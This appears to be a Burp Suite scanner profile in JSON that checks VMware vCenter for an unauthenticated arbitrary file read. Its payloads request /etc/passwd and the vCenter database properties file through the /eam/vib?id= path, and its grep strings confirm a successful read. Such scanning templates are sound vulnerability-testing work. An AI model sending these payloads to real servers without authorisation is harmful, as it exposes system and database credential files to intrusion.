[
  {
    "ProfileName": "VMware_vCenter_Unauthenticated_File_Read",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@weujieytt",
    "Payloads": [
      "true,/eam/vib?id\u003d/etc/passwd",
      "true,/eam/vib?id\u003dC:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\vcdb.properties"
    ],
    "Encoder": [],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [
      "true,,root:",
      "true,Or,org.postgresql.Driver"
    ],
    "Tags": [
      "All",
      "Unauthorized"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "200",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "isHeaderValue": false,
    "sequence": false,
    "NewHeaders": [],
    "MatchType": 1,
    "Scope": 0,
    "RedirType": 1,
    "MaxRedir": 0,
    "requestType": 1,
    "rawRequest": "",
    "payloadPosition": 1,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "VMware vCenter Unauthenticated Arbitrary File Read ",
    "IssueSeverity": "High",
    "IssueConfidence": "Firm",
    "IssueDetail": "VMware vCenter Unauthenticated Arbitrary File Read \nhttps://github.com/jas502n/Vmware_vCenter\n\u003cbr\u003e\n\u003cbr\u003e++ PAYLOAD: \u003cpayload\u003e\n\u003cbr\u003e \n\u003cbr\u003e\n++GREP: \u003cgrep\u003e\n\u003cbr\u003e\n\u003cbr\u003e",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      65,
      64
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false,
    "changeHttpRequest": false,
    "showIssue": false,
    "changeHttpRequestType": 1
  }
]